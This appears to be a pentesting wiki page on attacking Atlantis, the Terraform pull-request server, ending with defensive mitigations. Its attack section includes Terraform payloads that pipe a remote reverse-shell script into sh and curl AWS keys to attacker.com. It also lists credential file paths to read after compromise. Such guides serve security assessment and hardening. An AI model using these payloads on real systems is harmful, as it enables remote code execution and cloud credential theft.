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2022-04-06 18:21:07 +02:00
# Atlantis
## Basic Information
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
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![](<../.gitbook/assets/image (307) (3).png>)
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## Local Lab
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in
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## Atlantis Access
### Git Server Credentials
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
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In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
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### Webhooks
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
{% hint style="warning" %}
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
{% endhint %}
### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
* [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
* [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference)
* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
{% hint style="warning" %}
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
{% endhint %}
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### Web Page
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
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## Server Configuration
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)****
Values are **chosen in this order**:
1. Flags
2. Environment Variables
3. Config File
{% hint style="warning" %}
Note that in the configuration you might find interesting values such as **tokens and passwords**.
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### Repos Configuration
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
2. ****[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
3. **Default** values
#### PR Protections
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Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable` ** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
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In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
#### Scripts
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) **** (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) **** (_post workflow hooks_) a **workflow is executed.**
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml` ** file.
#### Workflow
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
****Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
{% hint style="danger" %}
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
# atlantis.yaml
version: 3
- dir: .
workflow: custom1
- init
- run: my custom plan command
- run: my custom apply command
{% endhint %}
#### Conftest Policy Checking
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include:
* Denying usage of a list of modules
* Asserting attributes of a resource at creation time
* Catching unintentional resource deletions
* Preventing security risks (ie. exposing secure ports to the public)
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
## Atlantis Commands
****[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
# Get help
atlantis help
# Run terraform plan
atlantis plan [options] -- [terraform plan flags]
## -d directory
## -p project
## --verbose
## You can also add extra terraform options
# Run terraform apply
atlantis apply [options] -- [terraform apply flags]
## -d directory
## -p project
## -w workspace
## --auto-merge-disabled
## --verbose
## You can also add extra terraform options
## Attacks
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{% hint style="warning" %}
If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
You can fix it by running:
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
{% endhint %}
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### Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan` ** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file:
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
### Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
However, you will usually need to bypass some protections:
* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
* Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)****
* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
* By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)****
Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
&#x20;**** You just need to make sure some payload like the following ones ends in the `main.tf` file:
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
2022-04-12 13:00:22 +02:00
### Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
atlantis plan -- <terraform commands>
atlantis plan -- -h #Get terraform plan help
atlantis apply -- <terraform commands>
atlantis apply -- -h #Get terraform apply help
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
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### Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
This possibility was mentioned in a previous section:
{% hint style="danger" %}
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
# atlantis.yaml
version: 3
- dir: .
workflow: custom1
- init
- run: my custom plan command
- run: my custom apply command
{% endhint %}
### PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
This is the **setting** in Github branch protections:
![](<../.gitbook/assets/image (307).png>)
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### Webhook Secret
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
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### Bitbucket
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
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## Post-Exploitation
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
* `/home/atlantis/.git-credentials` Contains vcs access credentials
* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
* `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
* Example: /atlantis-data/repos/ghOrg_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
* `/proc/1/environ` Env variables
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* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
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## Mitigations
### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
To prevent this, you could:
1. Bake providers into the Atlantis image or host and deny egress in production.
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
#### [#](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
## References
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)****